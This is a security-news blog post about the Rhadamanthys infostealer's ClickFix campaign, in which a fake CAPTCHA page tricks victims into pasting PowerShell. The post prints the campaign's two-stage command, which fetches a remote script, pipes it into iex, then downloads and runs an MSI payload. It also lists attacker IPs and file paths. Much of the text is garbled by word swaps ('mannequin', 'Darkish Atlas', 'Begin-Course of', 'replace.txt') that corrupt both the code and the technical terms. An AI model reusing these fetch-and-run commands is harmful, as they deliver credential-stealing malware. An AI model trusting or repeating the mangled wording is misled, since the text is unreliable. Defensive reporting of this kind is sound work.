Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Rhadamanthys Infostealer Leveraging ClickFix Technique to Steal Login Credentials

Rhadamanthys Infostealer Leveraging ClickFix Technique to Steal Login Credentials

Posted on July 10, 2025July 10, 2025 By CWS

Rhadamanthys first surfaced in 2022 as a modular stealer bought below the Malware-as-a-Service mannequin, however its newest marketing campaign reveals how shortly it’s innovating.

On the centre of the brand new wave is a booby-trapped CAPTCHA web page dubbed ClickFix, which instructs victims to “confirm” their session by pasting a PowerShell command.

As soon as executed, the command silently reaches out to hxxps://ypp-studio[.]com/replace.txt, turns off execution-policy safeguards and fetches the next-stage payload in reminiscence—fully fileless till the ultimate drop.

Darkish Atlas analysts famous that the lure pages are hosted on freshly registered typosquats, typically imitating YouTube Companion Studio or comparable SaaS portals, and that the underlying infrastructure has migrated from the sooner 77.239.96.51/rh_0.9.0.exe host to 62.60.226.74/PTRFHDGS.msi.

This delicate shift breaks hard-coded IoCs utilized by many safety instruments whereas preserving the stealer’s supply chain.

Marketing campaign telemetry reveals a major uptick in infections throughout small-to-medium enterprises throughout June and early July 2025, with stolen browser cookies and cloud credentials showing on dark-web markets inside hours of compromise.

What makes ClickFix particularly potent is its social-engineering layer. The CAPTCHA display gives a pretend sense of legitimacy whereas exactly guiding the sufferer to press Win + R, paste the command, and hit Enter.

That single motion bypasses conventional e-mail gateway filters and avoids the macros most blue groups hunt for.

Verification full (Supply – Darkish Atlas)

By the point a person sees the reassuring “Verification full!” pop-up, Rhadamanthys has already unpacked within the background and begun siphoning knowledge to its C2 at 193.109.85.136.

An infection Mechanism

The preliminary PowerShell command is closely padded with hash symbols to evade string-based detectors, but resolves into solely two purposeful traces:-

# Stage 1 – clipboard payload
$u=’hxxps://ypp-studio[.]com/replace.txt’; (New-Object Web.WebClient).DownloadString($u) | iex
# Stage 2 – decoded from Stage 1
Invoke-WebRequest -Uri -OutFile $env:AppData+’PTRFHDGS.msi’;
Begin-Course of msiexec.exe -ArgumentList ‘/i’, $env:AppData+’PTRFHDGS.msi’;

Stage 1 lives solely in reminiscence; Stage 2 writes the MSI installer as PTRFHDGS.msi, which drops rh_0.9.0.exe and launches it with msiexec in order that guardian/youngster correlations seem benign.

The executable instantly enumerates working processes, trying to find debuggers resembling x64dbg.exe, ida64.exe, or ProcessHacker.exe; if discovered, it terminates itself to frustrate evaluation.

It follows with time-based anti-sandbox checks utilizing QueryPerformanceCounter, then injects into WerFault.exe—a trusted Home windows Error Reporting binary—to persist and exfiltrate.

A single TCP stream to the hard-coded IP carries compressed archives containing browser databases, crypto-wallet information and KeePass vaults.

Capturing screenshot (Supply – Darkish Atlas)

Screenshots captured by way of BitBlt are appended, giving operators a real-time window into sufferer exercise.

Since Rhadamanthys resolves its C2 by literal IP, DNS-layer defences see nothing, and encrypted TLS over port 443 blends seamlessly with regular site visitors.

The ClickFix marketing campaign underscores how effortlessly adversaries can fuse social engineering with low-friction LOLBins to bypass layered defences.

Updating signature-based guidelines to incorporate execution-policy bypasses, monitoring youngster processes of msiexec.exe, and alerting on clipboard-sourced PowerShell are speedy steps defenders ought to take into account.

But the broader lesson is behavioural: any “verification” immediate that asks customers to run code is suspect—particularly when the one factor it fixes is the attacker’s foothold.

Examine stay malware conduct, hint each step of an assault, and make quicker, smarter safety selections -> Attempt ANY.RUN now

Cyber Security News Tags:ClickFix, Credentials, InfoStealer, Leveraging, Login, Rhadamanthys, Steal, Technique

Post navigation

Previous Post: ServiceNow Flaw CVE-2025-3648 Could Lead to Data Exposure via Misconfigured ACLs
Next Post: AirMDR Raises $15.5 Million for MDR Solution

Related Posts

Microsoft Defender Expands Security to Teams with URL Alerts Microsoft Defender Expands Security to Teams with URL Alerts Cyber Security News
Crimson Collective Claims to have Disconnected Many Brightspeed Home Internet Users Crimson Collective Claims to have Disconnected Many Brightspeed Home Internet Users Cyber Security News
Stealthy WordPress Malware Deliver Windows Trojan via PHP Backdoor Stealthy WordPress Malware Deliver Windows Trojan via PHP Backdoor Cyber Security News
Python Package Compromised by TeamPCP Hackers Python Package Compromised by TeamPCP Hackers Cyber Security News
Malicious Bing Ads deploy Weaponized PuTTY to Exploit Kerberos and Attack Active Directory services Malicious Bing Ads deploy Weaponized PuTTY to Exploit Kerberos and Attack Active Directory services Cyber Security News
Arizona Woman Sentenced for Helping North Korean IT Workers by Operating Laptop Farm Arizona Woman Sentenced for Helping North Korean IT Workers by Operating Laptop Farm Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Critical F5 BIG-IP Vulnerability Now Actively Exploited
  • China-Linked Cyber Threats Target Southeast Asian Government
  • AI-Powered VoidLink Malware Framework Poses New Cyber Threat
  • Top Log Monitoring Tools to Watch in 2026
  • Top Spam Filter Tools for 2026: A Comprehensive Guide

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Critical F5 BIG-IP Vulnerability Now Actively Exploited
  • China-Linked Cyber Threats Target Southeast Asian Government
  • AI-Powered VoidLink Malware Framework Poses New Cyber Threat
  • Top Log Monitoring Tools to Watch in 2026
  • Top Spam Filter Tools for 2026: A Comprehensive Guide

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark